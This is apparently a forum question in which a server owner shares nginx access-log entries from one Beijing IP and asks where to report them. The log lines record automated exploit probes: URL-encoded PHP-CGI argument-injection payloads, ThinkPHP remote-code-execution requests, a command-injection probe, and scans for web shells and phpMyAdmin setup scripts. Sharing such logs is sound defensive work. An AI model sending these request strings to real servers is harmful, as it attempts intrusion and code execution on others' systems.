# Where to share these entries in my nginx access log?

Tags: security

Seems like someone at 21. Financial Street in Beijing is looking for something. I wonder what, Joomla? Wordpress? Or just any CMS? I'm not sure this is the best forum for this. There are 827 more attempts. I wonder if there is a good place to share such entries so that they can be contained.

```
36.248.211.71 - - [10/Mar/2020:19:43:20 +0100] "GET / HTTP/1.1" 502 584 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
36.248.211.71 - - [10/Mar/2020:19:43:20 +0100] "GET /robots.txt HTTP/1.1" 502 584 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
36.248.211.71 - - [10/Mar/2020:19:43:20 +0100] "POST /Admin0fa8d952/Login.php HTTP/1.1" 502 584 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
36.248.211.71 - - [10/Mar/2020:19:43:21 +0100] "GET / HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
36.248.211.71 - - [10/Mar/2020:19:43:21 +0100] "GET /l.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
36.248.211.71 - - [10/Mar/2020:19:43:21 +0100] "GET /phpinfo.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
36.248.211.71 - - [10/Mar/2020:19:43:21 +0100] "GET /test.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
36.248.211.71 - - [10/Mar/2020:19:43:22 +0100] "POST /index.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
36.248.211.71 - - [10/Mar/2020:19:43:22 +0100] "POST /bbs.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
36.248.211.71 - - [10/Mar/2020:19:43:22 +0100] "POST /forum.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
36.248.211.71 - - [10/Mar/2020:19:43:22 +0100] "POST /forums.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
36.248.211.71 - - [10/Mar/2020:19:43:23 +0100] "POST /bbs/index.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
36.248.211.71 - - [10/Mar/2020:19:43:23 +0100] "POST /forum/index.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
36.248.211.71 - - [10/Mar/2020:19:43:24 +0100] "POST /forums/index.php HTTP/1.1" 502 182 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
36.248.211.71 - - [10/Mar/2020:19:43:24 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 502 182 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
36.248.211.71 - - [10/Mar/2020:19:43:24 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 502 182 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
36.248.211.71 - - [10/Mar/2020:19:43:25 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 502 182 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
36.248.211.71 - - [10/Mar/2020:19:43:25 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 502 182 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
36.248.211.71 - - [10/Mar/2020:19:43:25 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 502 182 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
36.248.211.71 - - [10/Mar/2020:19:43:26 +0100] "GET /webdav/ HTTP/1.1" 502 182 "-" "Mozilla/5.0"
36.248.211.71 - - [10/Mar/2020:19:43:26 +0100] "GET /help.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:26 +0100] "GET /java.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:26 +0100] "GET /_query.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:27 +0100] "GET /test.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:27 +0100] "GET /db_cts.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:28 +0100] "GET /db_pma.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:28 +0100] "GET /logon.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:28 +0100] "GET /help-e.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:29 +0100] "GET /license.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:29 +0100] "GET /log.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:29 +0100] "GET /hell.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:29 +0100] "GET /pmd_online.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:30 +0100] "GET /x.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:30 +0100] "GET /shell.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:30 +0100] "GET /htdocs.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:30 +0100] "GET /b.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:31 +0100] "GET /sane.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:31 +0100] "GET /desktop.ini.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:31 +0100] "GET /z.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:32 +0100] "GET /lala.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:32 +0100] "GET /lala-dpr.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:32 +0100] "GET /wpc.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:33 +0100] "GET /wpo.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:33 +0100] "GET /t6nv.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:33 +0100] "GET /muhstik.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:33 +0100] "GET /text.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:34 +0100] "GET /wp-config.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:34 +0100] "GET /muhstik.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:34 +0100] "GET /muhstik2.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:34 +0100] "GET /muhstiks.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:35 +0100] "GET /muhstik-dpr.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:35 +0100] "GET /lol.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:35 +0100] "GET /uploader.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:36 +0100] "GET /cmd.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:39 +0100] "GET /cmv.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:39 +0100] "GET /cmdd.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:41 +0100] "GET /knal.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:43 +0100] "GET /cmd.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:43 +0100] "GET /shell.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:44 +0100] "GET /appserv.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:44 +0100] "GET /scripts/setup.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:44 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:45 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:45 +0100] "GET /scripts/db___.init.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:45 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:45 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:46 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:46 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:47 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:48 +0100] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:48 +0100] "GET /pma/scripts/db___.init.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:48 +0100] "GET /PMA/scripts/db___.init.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:49 +0100] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:49 +0100] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:49 +0100] "GET /plugins/weathermap/editor.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:49 +0100] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:50 +0100] "GET /weathermap/editor.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:51 +0100] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:51 +0100] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:52 +0100] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:52 +0100] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:52 +0100] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:53 +0100] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:53 +0100] "GET / HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:53 +0100] "GET /joomla/ HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:53 +0100] "GET /Joomla/ HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:55 +0100] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:56 +0100] "GET /d7.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:56 +0100] "GET /rxr.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:56 +0100] "GET /1x.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:57 +0100] "GET /home.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:57 +0100] "GET /undx.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:57 +0100] "GET /spider.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
36.248.211.71 - - [10/Mar/2020:19:43:58 +0100] "GET /payload.php HTTP/1.1" 502 584 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
